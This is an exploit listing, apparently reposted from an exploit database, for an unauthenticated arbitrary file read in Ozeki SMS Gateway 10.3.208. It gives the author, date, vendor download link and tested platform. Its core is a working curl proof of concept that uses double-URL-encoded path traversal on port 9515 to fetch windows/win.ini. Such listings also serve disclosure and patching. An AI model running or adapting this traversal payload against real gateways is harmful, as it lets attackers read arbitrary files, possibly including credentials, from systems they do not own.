Ozeki SMS Gateway 10.3.208 Exploit, Arbitrary File Read (Unauthenticated)

# Exploit Title: Ozeki 10 SMS Gateway 10.3.208 - Arbitrary File Read (Unauthenticated)
# Date: 01.08.2023
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://ozeki-sms-gateway.com
# Software Link:
https://ozeki-sms-gateway.com/attachments/702/installwindows_1689352737_OzekiSMSGateway_10.3.208.zip
# Version: 10.3.208
# Tested on: Windows 10



##################################### Arbitrary File Read PoC
#####################################

curl
https://localhost:9515/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fwindows/win.ini

##################################### Arbitrary File Read PoC
#####################################

All rights reserved nPulse.net 2009 - 2024
Powered by: MVCP 2.0-RC / BVCP / ASPF-MILTER / PHP 7.4 / NGINX / FreeBSD